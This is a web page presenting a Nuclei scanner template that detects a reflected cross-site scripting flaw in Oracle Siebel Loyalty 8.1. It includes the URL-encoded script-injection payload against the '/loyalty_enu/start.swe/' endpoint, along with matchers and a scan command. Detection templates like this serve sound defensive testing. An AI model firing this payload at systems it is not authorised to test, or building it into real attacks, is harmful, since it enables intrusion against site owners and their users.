Skip to content

Oracle Siebel Loyalty 8.1 - Cross-Site Scripting

ID: oracle-siebel-xss

Severity: high

Author: dhiyaneshDK

Tags: xss,oracle,siebel,packetstorm,edb

A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitrary Javascript code into the responses returned by the ‘/loyalty_enu/start.swe/’ endpoint.

id: oracle-siebel-xss
info:
name: Oracle Siebel Loyalty 8.1 - Cross-Site Scripting
author: dhiyaneshDK
severity: high
description: A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitrary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint.
remediation: Upgrade to Siebel Loyalty version 8.2 or later.
reference:
- https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html
- https://exploit-db.com/exploits/47762
- https://docs.oracle.com/cd/E95904_01/books/Secur/siebel-security-hardening.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
metadata:
max-request: 1
tags: xss,oracle,siebel,packetstorm,edb
http:
- method: GET
path:
- '{{BaseURL}}/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a004730450220255e08a6d0f16b68d3d70c7398378fe9f657cf9a04bdcdb7a109991e548c01d9022100f4446409ae7eef8962c9aa20e4208e85fbe1702278f71f5e00fa3f3a89a15afc:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/oracle/oracle-siebel-xss.yaml"

View on Github